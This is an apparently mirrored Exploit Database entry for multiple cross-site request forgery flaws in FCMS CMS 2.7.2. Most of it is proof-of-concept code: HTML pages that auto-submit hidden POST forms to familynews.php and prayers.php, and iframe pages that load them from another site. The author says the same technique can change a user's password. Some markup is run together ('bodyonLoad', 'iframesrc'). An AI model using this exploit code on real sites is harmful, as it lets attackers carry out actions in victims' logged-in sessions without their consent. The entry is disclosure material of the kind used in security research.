FCMS CMS 2.7.2 – Multiple Cross-Site Request Forgery Vulnerabilities

• Exploit Database
• 13 阅读

• 作者： Ahmed Elhady Mohamed
  日期： 2011-12-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18232/

• FCMS_2.7.2 cms and earlier multiple CSRF Vulnerability
  ===================================================================================
  # Exploit Title: FCMS_2.7.2 cms multiple CSRF Vulnerability
  
  Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.7.2/FCMS_2.7.2.zip/download
  
  # Author: Ahmed Elhady Mohamed
  
  #version : 2.7.2
  
  # Category:: webapps
  
  # Tested on: windows XP Sp2 En
  
  # This vulnerability allows a malicious hacker to change password of a user
  and also it allows changing the website information.
  ===================================================================================
  
  
  
  #First we must install all optional sections during installation process.
  
  #there are csrf in all sections in this application for examples you can add news , pray for , 
  change the password and can do all functionalities are there.
  	
  #here are some examples for prove of concept
  	
  
  #########################################exploit code for Page "familynews.php"################################################	
  	
  	#Save the following codr in a file called "code.html"
  
  		<html>
  			<head>
  				<script type="text/javascript">
  					function autosubmit() {
  						document.getElementById('ChangeSubmit').submit();
  					}	
  				</script>
  			</head>
  			<bodyonLoad="autosubmit()">
  				<form method="POST"action="http://127.0.0.1/FCMS_2.7.2/FCMS_2.7.2/familynews.php"id="ChangeSubmit">
  					<input type="hidden"name="title"value="test" />
  					<input type="hidden"name="submitadd"value="Add" />
  					<input type="hidden"name="post"value="testcsrf" />
  					<input type="submit" value="submit"/>
  				</form>
  			</body>
  		</html>
  
  
  	
  	#then i called "code.html" from another page 
  
  	<html>
  		<body>
  			<iframesrc="https://www.exploit-db.com/exploits/18232/code.html" onLoad=""></iframe>
  		</body>
  	</html>
  
  
  ###########################################exploit code for Page "prayers.php" #################################################### 
  	
  	#Save the following code in a file called "code.html"
  	<html>
  		<head>
  			<script type="text/javascript">
  				function autosubmit() {	
  					document.getElementById('ChangeSubmit').submit();
  				}	
  			</script>
  		</head>
  		<bodyonLoad="autosubmit()">
  			<form method="POST"action="http://127.0.0.1/FCMS_2.7.2/FCMS_2.7.2/prayers.php" id="ChangeSubmit">
  				<input type="hidden"name="for"value="test" />
  				<input type="hidden"name="submitadd"value="Add" />
  				<input type="hidden"name="desc"value="testtest" />
  				<input type="submit" value="submit"/>
  			</form>
  		
  		</body>
  	</html>
  	
  	#then i called "code.html" from another page 
  
  	<html>
  		<body>
  			<iframesrc="https://www.exploit-db.com/exploits/18232/code.html" onLoad=""></iframe>
  		</body>
  	</html>
  
  
  	##############################################################################################################################